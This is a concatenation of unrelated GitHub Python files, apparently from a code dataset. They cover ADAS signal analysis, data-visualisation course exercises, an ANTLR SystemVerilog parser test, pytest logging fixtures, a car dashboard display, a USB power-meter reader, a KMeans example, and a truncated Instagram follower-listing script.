as pd\n\n\n\n# 广汽状态机4 to 7\nb = [\n 'ADAS_HWA_ILCLeftSt','ADAS_HWA_ILCRighttSt', #状态机or\n 'EPS_StrngWhlTorq', #驾驶员没有注意力集中(前置条件)\n #自车处于目标车道(前置条件)\n 'ADAS_LnMarkingCurvature',#曲率半径不符合变道条件\n #Manoeuvre 未在规定时间内结束\n 'BCM_TurnLightSwitchSt'#转向灯关闭或拨到反向\n ]\n\nclass ILC:\n def __init__(self, data):\n self.data = data\n def data_analysis(self, signal_list):\n all_sampleTime = []\n all_data = {}\n for this_value in self.data:\n sampleTime = [int(this_value['sampleTime']) - 1000*i for i in range(10)]\n sampleTime.reverse()\n all_sampleTime.extend(sampleTime)\n for key in signal_list:\n if key in this_value['dataList']:\n data = this_value['dataList'][key]\n if data == '':\n data = [0 for i in range(10)]\n elif 1 < len(data) < 10:\n if ',' not in data:\n data = [data] + [0 for i in range(9)]\n else:\n data = data.split(',') + [0 for i in range(10-len(data))]\n else:\n data = data.split(',')\n else:\n continue\n data.reverse()\n if key in all_data:\n all_data[key].extend(data)\n else:\n all_data[key] = data\n #print('all_data:',all_data) \n return (all_sampleTime, all_data)\n def create_DataFrame(self, data):\n sample_data = {}\n for key in data.keys():\n sample_data[key] = data[key]['samples']\n index_list = []\n index_num = 0\n print('开始构建DataFrame')\n data_len = []\n key_list = []\n for key,value in sample_data.items():\n data_len.append(len(value))\n key_list.append(key)\n for i in range(len(data_len)):\n if data_len[i] < max(data_len):\n sample_data[key_list[i]].extend([0 for j in range(max(data_len)-data_len[i])])\n this_data = pd.DataFrame(sample_data)\n message_list = []\n columns_list = list(this_data)\n print('开始计算单一时间的状态')\n for indexs in this_data.index:\n # 单行数据转化列表\n one_result = []\n one_data = this_data.loc[indexs].values.tolist()\n for i in range(len(one_data)):\n if i== 0:\n if one_data[i] == 0:\n pass\n else:\n for key,value in data[columns_list[i]]['condition'].items():\n if one_data[i] == value:\n one_result.append(columns_list[i] + ': ' + key)\n break\n\n elif i==1:\n if one_data[i] == 0:\n pass\n else:\n for key,value in data[columns_list[i]]['condition'].items():\n if one_data[i] == value:\n one_result.append(columns_list[i] + ': ' + key)\n break\n elif i==2:\n if one_data[i] == 0:\n pass\n else:\n for key,value in data[columns_list[i]]['condition'].items():\n if one_data[i] == value:\n one_result.append(columns_list[i] + ': ' + key)\n break\n elif i==3:\n for key,value in data[columns_list[i]]['condition'].items():\n if one_data[i] == value:\n one_result.append(columns_list[i] + ': ' + key)\n break\n if one_result == []:\n message = '功能运行正常。'\n else:\n message = ';'.join(one_result)\n message_list.append(message)\n this_data['Final_result'] = message_list\n return this_data\n def ILC_to_seven(self):\n timestamps, datalist = self.data_analysis(b)\n result = {\n # 1 ILC状态机\n 'ILC_state': {'key': ['ADAS_HWA_ILCLeftSt','ADAS_HWA_ILCRighttSt'], 'samples': [], 'timestamps': [], 'condition':{'Not_TOR': 0, 'TOR_left': 1,'TOR_right': 2}},\n # 2 驾驶员没有注意力集中(前置条件)\n 'Driver_attention': {'key': ['EPS_StrngWhlTorq'], 'samples': [], 'timestamps': [], 'condition':{'Attention': 0,'No_attention': 1}},\n # 3 自车处于目标车道(前置条件)(暂无信号)\n # 4 曲率半径不符合变道条件\n 'Curvature_radius': {'key': ['ADAS_LnMarkingCurvature'], 'samples': [], 'timestamps': [], 'condition':{'Normal': 0, 'Out_of_range': 1}},\n # 5 Manoeuvre 未在规定时间内结束(暂无信号)\n # 6 转向灯关闭或拨到反向\n 'Turnlight_state': {'key': ['BCM_TurnLightSwitchSt'], 'samples': [], 'timestamps': [], 'condition':{'Not_active': 0, 'Turn_left': 1,'Turn_right':2,'Error':3}},\n \n }\n '''\n 判断条件\n '''\n for key in result.keys():\n result[key]['timestamps'] = timestamps\n if key == 'ILC_state':\n key_1, key_2 = result[key]['key']\n if key_1 in datalist and key_2 in datalist:\n for i in range(len(datalist[key_1])):\n if int(datalist[key_1][i]) == 7:\n result[key]['samples'].append(1)\n elif int(datalist[key_2][i]) == 7:\n result[key]['samples'].append(2)\n else:\n result[key]['samples'].append(0)\n if key == 'Driver_attention':\n key_1= str(result[key]['key'])\n if key_1 in datalist:\n for i in range(len(datalist[key_1])):\n try:\n if float(datalist[key_1][i]) < 0.6:\n result[key]['samples'].append(1)\n else:\n result[key]['samples'].append(0)\n except IndexError:\n break\n\n if key == 'Curvature_radius':\n key_1= str(result[key]['key'])\n if key_1 in datalist:\n for i in range(len(datalist[key_1])):\n if float(datalist[key_1][i]) > 0.00142857:\n result[key]['samples'].append(1)\n else:\n result[key]['samples'].append(0)\n \n if key == 'Turnlight_state':\n key_1= str(result[key]['key'])\n if key_1 in datalist:\n for i in range(len(datalist[key_1])):\n if int(datalist[key_1][i]) == 0:\n result[key]['samples'].append(0)\n elif int(datalist[key_1][i]) == 1:\n result[key]['samples'].append(1)\n elif int(datalist[key_1][i]) == 2:\n result[key]['samples'].append(2)\n else:\n result[key]['samples'].append(3)\n\n\n \n this_dataFrame = self.create_DataFrame(result)\n print(this_dataFrame)\n return this_dataFrame","repo_name":"kawakami-araki/001","sub_path":"new_tesk/ILC_to_seven.py","file_name":"ILC_to_seven.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72114812326","text":"from __future__ import (absolute_import, division, print_function, unicode_literals)\r\nimport math\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport utils\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.ticker as tkr\r\nimport plotly\r\nimport plotly.graph_objs as go\r\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\r\nfrom pylab import rcParams\r\nfrom sklearn.manifold import TSNE\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\n\r\ndef header(): return 'LECTURE 2: Visualization https://habrahabr.ru/company/ods/blog/323210/'\r\n\r\ndef run():\r\n\r\n #df = pd.DataFrame(\r\n # {\"Success\": 20*[\"Yes\"] + 20*[\"No\"],\r\n # \"B\": np.random.randint(1, 7, 40)})\r\n #\r\n #print(df.head(-1))\r\n #\r\n #print('***********************')\r\n #\r\n ##df = pd.melt(df, value_vars=['A'], id_vars='Success')\r\n #print(df.head(-1))\r\n #sns.violinplot(y='B', x='Success', hue='Success', data=df)\r\n #plt.show()\r\n\r\n\r\n lec_notes()\r\n homework()\r\n\r\n return\r\n\r\ndef homework():\r\n\r\n sns.set_context('notebook',\r\n font_scale=1.5,\r\n rc={\r\n 'figure.figsize': (12, 9),\r\n 'axes.titlesize': 18})\r\n\r\n train = pd.read_csv(utils.PATH.COURSE_FILE('mlbootcamp5_train.csv'), sep=';', index_col='id')\r\n print(train.head())\r\n print('dataset size:', train.shape)\r\n\r\n # -----------------------------\r\n\r\n train_uniques = pd.melt(frame=train,\r\n value_vars=['gender', 'cholesterol', 'gluc', 'smoke', 'alco', 'active', 'cardio'])\r\n train_uniques = pd.DataFrame(train_uniques.groupby(['variable', 'value'])['value'].count()) \\\r\n .sort_index(level=[0, 1]) \\\r\n .rename(columns={'value': 'count'}) \\\r\n .reset_index()\r\n print(train_uniques.head(-1))\r\n\r\n sns.factorplot(x='variable', y='count', hue='value',\r\n data=train_uniques, kind='bar', size=12)\r\n plt.show()\r\n\r\n # -----------------------------\r\n\r\n train_uniques = pd.melt(frame=train,\r\n value_vars=['gender', 'cholesterol', 'gluc', 'smoke', 'alco', 'active'],\r\n id_vars=['cardio'])\r\n train_uniques = pd.DataFrame(train_uniques.groupby(['variable', 'value', 'cardio'])['value'].count()) \\\r\n .sort_index(level=[0, 1]) \\\r\n .rename(columns={'value': 'count'}) \\\r\n .reset_index()\r\n print(train_uniques.head(-1))\r\n\r\n sns.factorplot(x='variable', y='count', hue='value',\r\n col='cardio', data=train_uniques, kind='bar', size=9)\r\n plt.show()\r\n\r\n print('*************************')\r\n\r\n for c in train.columns:\r\n n = train[c].nunique()\r\n print(c)\r\n\r\n if (n<=3):\r\n print(n, sorted(train[c].value_counts().to_dict().items()))\r\n else:\r\n print(n)\r\n print(10*'-')\r\n\r\n print('*************************')\r\n\r\n corr_matrix_pearson = train.corr(method='pearson')\r\n sns.heatmap(corr_matrix_pearson)\r\n plt.show()\r\n\r\n sns.violinplot(x='gender', y='height', hue='gender', scale='count', split=True, data=train)\r\n plt.show()\r\n\r\n df_woman = train[train.gender==1]['height']\r\n df_man = train[train.gender==2]['height']\r\n ax = sns.kdeplot(df_woman, legend=True, bw=0.5)\r\n sns.kdeplot(df_man, legend=True, bw=0.5)\r\n plt.show()\r\n\r\n corr_matrix_spearman = train.corr(method='spearman')\r\n sns.heatmap(corr_matrix_spearman)\r\n plt.show()\r\n\r\n df_cleared = train[(train['ap_hi']>train['ap_lo']) &\r\n (train['ap_hi']<400) &\r\n (train['ap_lo']<400) &\r\n (train['ap_hi']>0) &\r\n (train['ap_lo']>0)]\r\n ap_hi = np.log(df_cleared['ap_hi'])\r\n ap_lo = np.log(df_cleared['ap_lo'])\r\n\r\n ax = sns.jointplot(ap_hi, ap_lo)\r\n plt.show()\r\n\r\n train['age_years'] = (train['age'] // 365.25).astype(int)\r\n sns.countplot(x='age_years', hue='cardio', data=train)\r\n plt.show()\r\n\r\n return\r\n\r\n\r\ndef lec_notes():\r\n\r\n rcParams['figure.figsize'] = 8, 5\r\n df = pd.read_csv(utils.PATH.COURSE_FILE('video_games_sales.csv'))\r\n print(df.info())\r\n print(len(df))\r\n\r\n df = df.dropna()\r\n\r\n df['User_Score'] = df.User_Score.astype('float64')\r\n df['Year_of_Release'] = df.Year_of_Release.astype('int64')\r\n df['User_Count'] = df.User_Count.astype('int64')\r\n df['Critic_Count'] = df.Critic_Count.astype('int64')\r\n\r\n print(df.shape)\r\n\r\n useful_cols = ['Name', 'Platform', 'Year_of_Release', 'Genre', 'Global_Sales',\r\n 'Critic_Score', 'Critic_Count',\r\n 'User_Score', 'User_Count', 'Rating']\r\n print(df[useful_cols].head())\r\n\r\n pandas(df)\r\n seaborn(df)\r\n plotly(df)\r\n\r\n df = pd.read_csv(utils.PATH.COURSE_FILE('telecom_churn.csv'))\r\n #print(df.head())\r\n print(df.info())\r\n print(df.shape)\r\n\r\n #visual_analysis(df)\r\n t_sne(df)\r\n\r\n return\r\n\r\ndef pandas(df):\r\n sales_df = df[[x for x in df.columns if 'Sales' in x] + ['Year_of_Release']]\r\n sales_df.groupby('Year_of_Release').sum().plot()\r\n plt.show()\r\n\r\n sales_df.groupby('Year_of_Release').sum().plot(kind='bar', rot=45)\r\n plt.show()\r\n\r\n return\r\n\r\ndef seaborn(df):\r\n cols = ['Global_Sales',\r\n 'Critic_Score', 'Critic_Count',\r\n 'User_Score', 'User_Count']\r\n sns_plot = sns.pairplot(df[cols])\r\n sns_plot.savefig('pairplot.png')\r\n\r\n sns.distplot(df.Critic_Score)\r\n plt.show()\r\n\r\n sns.jointplot(df['Critic_Score'], df['User_Score'])\r\n plt.show()\r\n\r\n top_platforms = df.Platform.value_counts().sort_values(ascending=False).head(5).index.values\r\n sns.boxplot(y='Platform', x='Critic_Score', data=df[df.Platform.isin(top_platforms)], orient='h')\r\n plt.show()\r\n\r\n platform_genre_sales = df.pivot_table(index='Platform',\r\n columns='Genre',\r\n values='Global_Sales',\r\n aggfunc=sum).fillna(0).applymap(float)\r\n sns.heatmap(platform_genre_sales, annot=True, fmt='0.1f', linewidths=0.5)\r\n plt.show()\r\n\r\n return\r\n\r\ndef plotly(df):\r\n init_notebook_mode(connected=True)\r\n\r\n #1 посчитаем число вышедших игр и проданных копий по годам\r\n\r\n df_sales = df.groupby('Year_of_Release')[['Global_Sales']].sum()\r\n df_cnts = df.groupby('Year_of_Release')[['Name']].count()\r\n df_years = df_sales.join(df_cnts)\r\n df_years.columns = ['Global_Sales', 'Number_of_Games']\r\n\r\n trace0 = go.Scatter(x=df_years.index,\r\n y=df_years.Global_Sales,\r\n name='Global Sales')\r\n\r\n trace1 = go.Scatter(x=df_years.index,\r\n y=df_years.Number_of_Games,\r\n name='Number of games released')\r\n\r\n data = [trace0, trace1]\r\n layout = {'title': 'Statistics of video games'}\r\n\r\n fig = go.Figure(data=data, layout=layout)\r\n plot(fig, filename='years_stats.html', show_link=False)\r\n\r\n #2 считаем число проданных и вышедших игр по платформам\r\n\r\n df_platforms_sales = df.groupby('Platform')[['Global_Sales']].sum()\r\n df_platforms_cnt = df.groupby('Platform')[['Name']].count()\r\n df_platforms = df_platforms_sales.join(df_platforms_cnt)\r\n df_platforms.columns = ['Global_Sales', 'Number_of_Games']\r\n df_platforms.sort_values('Global_Sales', ascending=False, inplace=True)\r\n\r\n trace0 = go.Bar(x=df_platforms.index,\r\n y=df_platforms.Global_Sales,\r\n name='Global Sales')\r\n\r\n trace1 = go.Bar(x=df_platforms.index,\r\n y=df_platforms.Number_of_Games,\r\n name='Numer of games released')\r\n\r\n data = [trace0, trace1]\r\n layout = {'title': 'Share of platforms', 'xaxis': {'title': 'platform'}}\r\n\r\n fig = go.Figure(data=data, layout=layout)\r\n plot(fig, show_link=False)\r\n\r\n #3 создаем Box trace для каждого жанра из наших данных\r\n\r\n data = []\r\n for genre in df.Genre.unique():\r\n data.append(go.Box(y=df[df.Genre==genre].Critic_Score, name=genre))\r\n\r\n plot(data, show_link=False)\r\n\r\n return\r\n\r\ndef visual_analysis(df):\r\n\r\n print(df['Churn'].value_counts())\r\n\r\n df['Churn'].value_counts().plot(kind='bar', label='Churn')\r\n plt.legend()\r\n plt.title('Ottok clientov')\r\n plt.show()\r\n\r\n corr_matrix = df.drop(['State', 'International plan', 'Voice mail plan', 'Area code'], axis=1).corr()\r\n sns.heatmap(df.corr())\r\n plt.show()\r\n\r\n features = list(set(df.columns)-set(['State', 'International plan', 'Voice mail plan', 'Area code',\r\n 'Total day charge', 'Total eve charge', 'Total night charge', 'Total intl charge',\r\n 'Churn']))\r\n df[features].hist(figsize=(20,12))\r\n plt.show()\r\n\r\n #sns.pairplot(df[features + ['Churn']], hue='Churn')\r\n #plt.show()\r\n\r\n fig, axes = plt.subplots(nrows=3, ncols=4, figsize=(16, 10))\r\n\r\n for idx, feat in enumerate(features):\r\n ax_row = int(idx/4)\r\n ax_col = int(idx%4)\r\n sns.boxplot(x='Churn', y=feat, data=df, ax=axes[ax_row, ax_col])\r\n axes[ax_row, ax_col].legend()\r\n axes[ax_row, ax_col].set_xlabel('Churn')\r\n axes[ax_row, ax_col].set_ylabel(feat)\r\n plt.show()\r\n\r\n _, axes = plt.subplots(2, 2, figsize=(16, 6))\r\n\r\n sns.boxplot(x='Churn', y='Total day minutes', data=df, ax=axes[0, 0])\r\n sns.violinplot(x='Churn', y='Total day minutes', data=df, ax=axes[0, 1])\r\n sns.countplot(x='International plan', hue='Churn', data=df, ax=axes[1, 0]);\r\n sns.countplot(x='Voice mail plan', hue='Churn', data=df, ax=axes[1, 1]);\r\n plt.show()\r\n\r\n sns.countplot(x='Customer service calls', hue='Churn', data=df)\r\n plt.show()\r\n\r\n st = df.groupby(['State'])['Churn'].agg([np.mean]).sort_values(by='mean', ascending=False).T\r\n print(st)\r\n\r\n return\r\n\r\ndef t_sne(df):\r\n\r\n X = df.drop(['State'], axis=1)\r\n X['International plan'] = pd.factorize(X['International plan'])[0]\r\n X['Voice mail plan'] = pd.factorize(X['Voice mail plan'])[0]\r\n\r\n scaler = StandardScaler()\r\n X_scaled = scaler.fit_transform(X)\r\n\r\n tsne = TSNE(random_state=17)\r\n tsne_representation = tsne.fit_transform(X_scaled)\r\n\r\n plt.scatter(tsne_representation[:, 0], tsne_representation[:, 1])\r\n plt.show()\r\n\r\n\r\n return","repo_name":"sergey-msu/ods-course-2018","sub_path":"src/l2_visualization.py","file_name":"l2_visualization.py","file_ext":"py","file_size_in_byte":10162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41511204347","text":"#!/usr/bin/env python3\nfrom antlr4 import *\nfrom SvLexer import SvLexer\nfrom SvParser import SvParser\nfrom SvVisitor import *\nimport TreeUtils\n\n# from antlr4.InputStream import InputStream\nimport sys\n\n\n# convert s json structure into xml\ndef json2xml(dump: str) -> str:\n import json\n import dict2xml\n d = json.loads(dump)\n outp = \"\"\n outp += '\\n'\n outp += \"\\n\"\n outp += dict2xml.dict2xml(d) + \"\\n\"\n outp += \"\\n\"\n return outp\n\n\nclass KeyPrinterVisitor(SvVisitor):\n pass\n\n\ndef parseAndVisit(argv):\n inputStream = FileStream(argv[1], encoding='utf-8')\n\n outputFileName = None\n if len(argv) >= 3:\n outputFileName = argv[2]\n\n lexer = SvLexer(inputStream)\n stream = CommonTokenStream(lexer)\n parser = SvParser(stream)\n tree = parser.source_text()\n # dump = tree.toStringTree(recog=parser)\n\n if outputFileName:\n ext = outputFileName[outputFileName.rindex(\".\") + 1:]\n if ext in (\"lisp\", \"json\", \"xml\"):\n if ext == \"lisp\":\n dump = TreeUtils.toLispStringTree(tree, recog=parser)\n elif ext == \"json\":\n dump = TreeUtils.toJsonStringTree(tree, recog=parser)\n elif ext == \"xml\":\n dump = TreeUtils.toJsonStringTree(tree, recog=parser)\n dump = json2xml(dump)\n\n with open(outputFileName, 'wt') as fout:\n print(dump, file=fout)\n else:\n # using JSON as default\n dump = TreeUtils.toJsonStringTree(tree, recog=parser)\n print(dump)\n\n printer = KeyPrinterVisitor()\n printer.visit(tree)\n\n\nif __name__ == '__main__':\n parseAndVisit(sys.argv)\n","repo_name":"miguel-guerrero/antlr4_system_verilog_parser","sub_path":"python/TestSvVisitor.py","file_name":"TestSvVisitor.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19792835679","text":"import pathlib\nimport typing as t\nimport logging\n\nimport pytest\n\n\nlogger = logging.getLogger(__name__)\n\n\n@pytest.fixture\ndef log_error():\n def _log_error():\n logger.error('Some Error')\n return _log_error\n\n\n@pytest.fixture\ndef log_exception(test_exception):\n def _log_exception():\n try:\n raise test_exception('Some Exception')\n except test_exception as exc:\n logger.error(str(exc), exc_info=exc)\n return _log_exception\n\n\n@pytest.fixture\ndef error_log_args():\n return ['Some Error']\n\n\n@pytest.fixture\ndef exception_log_args(\n test_exception,\n):\n return ['Some Exception', pytest.raises(test_exception)]\n\n\n@pytest.mark.parametrize(\n [\n 'func',\n 'fixture_args',\n ],\n [\n [\n pytest.lazy_fixture('log_error'), # noqa\n pytest.lazy_fixture('error_log_args'), # noqa\n ],\n [\n pytest.lazy_fixture('log_exception'), # noqa\n pytest.lazy_fixture('exception_log_args'), # noqa\n ],\n ],\n)\ndef test_assert_log_errors(\n assert_log_errors,\n func: t.Callable,\n fixture_args,\n):\n func()\n assert_log_errors(*fixture_args)\n\n\n@pytest.fixture\ndef _pytest_ini(resources):\n return pathlib.Path(\n resources,\n 'test_fixtures',\n 'test_check_no_error',\n '_pytest.ini',\n ).read_text()\n\n\n@pytest.fixture\ndef _conftest(resources):\n return pathlib.Path(\n resources,\n 'test_fixtures',\n 'test_check_no_error',\n '_conftest.py',\n ).read_text()\n\n\n@pytest.fixture\ndef _tests(resources):\n return pathlib.Path(\n resources,\n 'test_fixtures',\n 'test_check_no_error',\n '_tests.py',\n ).read_text()\n\n\ndef test_check_no_error(\n _pytest_ini,\n _conftest,\n _tests,\n\n testdir,\n assert_log_errors,\n):\n testdir.makeini(_pytest_ini)\n testdir.makeconftest(_conftest)\n testdir.makepyfile(_tests)\n result = testdir.runpytest()\n result.assert_outcomes(passed=2, errors=2, failed=1)\n assert_log_errors(\n 'Some Error',\n\n # нельзя использовать фикстуру test_exception,\n # потому что внутри `runpytest` инициализируются\n # свои фикстуры и `test_exception` созданный там\n # будет отличаться от здешнего `test_exception`\n 'Some Exception',\n pytest.raises(Exception),\n )\n","repo_name":"mikhailkovalev/pocketbook","sub_path":"tests/test_fixtures.py","file_name":"test_fixtures.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10172707042","text":"jaden = ''\nstring = \"How can mirrors be real if our 5 eyes aren't real\"\ncounter = 0\nfor letter in string:\n if counter > -1:\n jaden += letter.upper()\n counter = -1\n else:\n if letter.isalpha:\n jaden += letter\n if letter == \" \":\n jaden += letter\n counter = 1\n \n\nprint(jaden)","repo_name":"TheAxumite/CS50Web-Codewars","sub_path":"CodeWars/Jaden.py","file_name":"Jaden.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40152654822","text":"'''\nA place for my main draw functions.\nJust an attempt to clean up the main file.\n'''\nfrom main import *\n\n\n\ndef mileage():\n '''\n Text File or Odometer and Tripometer Information (pulled from ManxGauged project, just reads from text file\n Need to incorporate writing to the file after I figure out how to tabulate the mileage based on GPS or CV\n '''\n global odo_font\n odometer = 0\n tripometer = 0\n odofile = open(\"odo.txt\", \"r\")\n odo_from_file_text_line1 = odofile.readline()\n response = odo_from_file_text_line1.replace('\\n', \"\")\n response2 = response.replace('\\r', \"\")\n response3 = response2.replace(\"odo:\", \"\")\n try:\n odometer = int(response3)\n except:\n print(\"Error: ODO read from file is not an int\")\n error_reading_odo_from_file = 1\n odometer_arduino = odometer\n\n odo_from_file_text_line2 = odofile.readline()\n response = odo_from_file_text_line2.replace('\\n', \"\")\n response2 = response.replace('\\r', \"\")\n response3 = response2.replace(\"trip:\", \"\")\n try:\n tripometer = int(response3)\n except:\n print\n \"Error: Trip read from file is not an int\"\n error_reading_odo_from_file = 1\n odofile.close()\n\n # Drawing the Odometer\n digital_odo = odometer\n odo_text = odo_font.render(str(digital_odo), True, NEON_GREEN)\n text_rect = odo_text.get_rect()\n text_rect.midright = ODO_L_XY\n WIN.blit(odo_text, text_rect)\n\n\ndef draw_clock():\n '''\n Drawing the clock - currently only 24hr. I'm sure its easy to adapt to 12hr.\n '''\n now = datetime.now()\n bgclock_text = digital_font.render(\"00:00\", True, DARK_GREY)\n WIN.blit(bgclock_text, CLOCK_XY)\n digital_text = now.strftime('%H:%M')\n text = digital_font.render(digital_text, True, NEON_GREEN)\n WIN.blit(text, CLOCK_XY)\n\n#####\n# Functions for Drawing onto the screen\n#####\n\ndef draw_fuel_text():\n global digital_font\n digital_fuel = fuel_status\n fuel_text = digital_font.render(str(int(digital_fuel)), True, NEON_GREEN)\n text_rect = fuel_text.get_rect()\n text_rect.midright = 1717, 667\n WIN.blit(fuel_text, text_rect)\n\n\ndef draw_speedometer_text():\n ''' Speedometer Font Testing '''\n global speed_status\n global font_speedunits\n speedtext = font_speedunits.render(str(speed_status), True, NEON_YELLOW)\n text_rect = speedtext.get_rect()\n text_rect.midright = SPEEDO_XY\n WIN.blit(speedtext, text_rect)\n\ndef draw_mfa():\n '''\n Drawing the clock and interior temp - should seperate as the MFA will eventually evolve.\n '''\n global outside_temp_status\n\n WIN.blit(MFA, MFABG_XY)\n # Draw MFA display\n text = digital_font.render(str(outside_temp_status), True, NEON_GREEN)\n # Enables the text to be right center aligned\n text_rect = text.get_rect()\n text_rect.midright = MFA_XY\n WIN.blit(text, text_rect)\n\n\n\n\ndef draw_indicators():\n '''\n The area where I blit or draw the indicators/idiot lights and turn signals/low fuel etc.\n\n '''\n\n if illumination_state == 1:\n WIN.blit(indicator_images[0], (45, 460))\n if foglight_state == 1:\n WIN.blit(indicator_images[1], (185, 460))\n if defog_state == 1:\n WIN.blit(indicator_images[2], (325, 460))\n if highbeam_state == 1:\n WIN.blit(indicator_images[3], (465, 460))\n if leftturn_state == 1:\n WIN.blit(indicator_images[4], (605, 460))\n if rightturn_state == 1:\n WIN.blit(indicator_images[5], (1220, 460))\n if brakewarn_state == 1:\n WIN.blit(indicator_images[6], (1360, 460))\n if oillight_state == 1:\n WIN.blit(indicator_images[7], (1500, 460))\n if alt_state == 1:\n WIN.blit(indicator_images[8], (1640, 460))\n if glow_state == 1:\n WIN.blit(indicator_images[9], (1780, 460))\n\n # To highlight the fuel reserve indicator (factory is at 7 litres\n if fuel_status <= 7:\n WIN.blit(fuelresOn, (1795, 616))\n else:\n WIN.blit(fuelresOff, (1795, 616))","repo_name":"gfunkbus76/Digifiz-Dash","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"52"} +{"seq_id":"6867358694","text":"from docopt import docopt\nfrom sys import stdout, stderr\nimport time, select, struct, sys\nimport usb.core, usb.util\n\nSYNC_STRING = \"S\" + \" \"*14 + \"E\"\nDATA_LENGTH = 4 * 3\nTOTAL_LENGTH = len(SYNC_STRING) + DATA_LENGTH\n\ndef loop():\n\n # 1. Try to find and connect to a Trinket\n\n if args[\"--verbose\"]:\n stderr.write(\"Waiting for a Trinket...\")\n stderr.flush()\n\n while True:\n trinket = usb.core.find(idVendor = 0x1781, idProduct = 0x1111)\n if trinket: break\n time.sleep(0.1) # don't hog all CPU\n\n trinket.set_configuration()\n endpoint = trinket[0][(0,0)][0] # the first endpoint should be the only endpoint, it should be an interrupt-in endpoint\n\n if not args[\"--quiet\"]:\n stderr.write(\"Connected to a Trinket.\\n\")\n stderr.flush()\n\n if not args[\"--raw\"]:\n if args[\"--no-ansi\"]:\n format = \"Shunt: %7.2fmV %6.2fV / %6.3fA / %6.2fW\\n\"\n else:\n format = \"\\r\\x1b[2KShunt: %7.2fmV \\x1b[1m%6.2f\\x1b[mV / \\x1b[1m%6.3f\\x1b[mA / \\x1b[1m%6.2f\\x1b[mW \"\n stdout.write(\"Shunt: ---.--mV --.--V / -.---A / --.--W \")\n stdout.flush()\n\n # 2. Start reading lectures\n\n while True:\n try:\n chunk = bytearray()\n while True:\n # read next byte, rotate the chunk\n chunk.append(endpoint.read(1)[0])\n if len(chunk) > TOTAL_LENGTH: chunk = chunk[len(chunk) - TOTAL_LENGTH:]\n # break if we have a complete, correct chunk\n if len(chunk) == TOTAL_LENGTH and chunk.startswith(SYNC_STRING): break\n\n # parse the chunk, output result\n lecture = struct.unpack(\"fff\", chunk[len(SYNC_STRING):])\n\n if args[\"--raw\"]:\n stdout.write(\"\\t\".join(str(f) for f in lecture) + \"\\n\")\n else:\n voltage = lecture[1]; current = lecture[2] / 1000\n if args[\"--sense\"]: voltage += lecture[0] / 1000\n stdout.write(format % (lecture[0], voltage, current, voltage * current))\n\n stdout.flush()\n\n except usb.core.USBError as ex:\n if args[\"--verbose\"]:\n print('USB read error:', ex)\n break\n\n stdout.write(\"\\n\")\n\n\n if not args[\"--quiet\"]:\n stderr.write(\"Disconnecting from the Trinket.\\n\\n\")\n stderr.flush()\n\n\nif __name__ == '__main__':\n args = docopt(__doc__, version=\"power-trinket 0.0.1\")\n try:\n if args[\"--once\"]:\n loop()\n else:\n while True:\n loop()\n time.sleep(0.5)\n except KeyboardInterrupt:\n stderr.write(\"\\n\")\n","repo_name":"mildsunrise/power-trinket","sub_path":"power-trinket.py","file_name":"power-trinket.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35629793642","text":"import matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom sklearn.datasets import make_blobs\n\nfont = {'family': 'simsun', 'size': 12}\nplt.figure(figsize=[10, 5])\n\ncenters = [[0, 1], [-1, -1], [1, -1]]\nX, labels_true = make_blobs(n_samples=300, # 生成数据集\n centers=centers, cluster_std=0.3)\n\n# 画出原始数据\nplt.subplot(1, 2, 1)\nplt.scatter(X[:, 0], X[:, 1])\nplt.xlabel('(a) 原始数据', fontdict=font)\n\nk_means = KMeans(n_clusters=3) # K均值估计器\nk_means.fit(X) # 聚类\n\n# 画出聚类结果\nplt.subplot(1, 2, 2)\nmarker_list = ['o', 's', '^']\ncolor_list = ['r', 'b', 'g']\nfor i in range(3):\n c_data = X[k_means.labels_ == i] # 获取一个类别的数据\n plt.scatter(c_data[:, 0], c_data[:, 1], # 画出一个类别\n c=color_list[i], marker=marker_list[i], alpha=0.6)\n\nplt.xlabel('(b) 聚类结果', fontdict=font)\nplt.show()\n","repo_name":"hitlic/python_book","sub_path":"codes/chapter-08/eg_8-16.py","file_name":"eg_8-16.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"52"} +{"seq_id":"36689868841","text":"#Getting a list of account followers!\nfrom InstagramAPI import InstagramAPI\nimport random\nimport time\nimport sys\n\ndef getTotalFollowers(api, user_id):\n \"\"\"\n Returns the list of followers of the user.\n It should be equivalent of calling api.getTotalFollowers from InstagramAPI\n \"\"\"\n\n followers = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n\n _ = api.getUserFollowers(user_id, maxid=next_max_id)\n followers.extend(api.LastJson.get('users', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n return followers\n\n\nif __name__ == \"__main__\":\n non_bmp_map = dict.fromkeys(range(0x10000, sys.maxunicode + 1), 0xfffd)\n\n #Logining in\n api = InstagramAPI(\"\", \"\")\n api.login()\n\n usedList = [5783083247, 200770901, 6223763144, 708885350, 1190318950, 4262637901, 1816863358, 6067232924, 40393730, 7071712831, 1751097425, 7203236488, 4926947083, 4640697970, 7301520547, 14819244, 551414615]\n userList = [7203236488]\n userList = [839915492]\n for user in userList:\n try:\n #Printing out the current user id\n print(\"User ID: \" + str(user))\n \n #Getting the list of followers for the specified ID\n followers = api.getTotalFollowers(int(user))\n print(\"Number of followers: \" + str(len(followers)) + 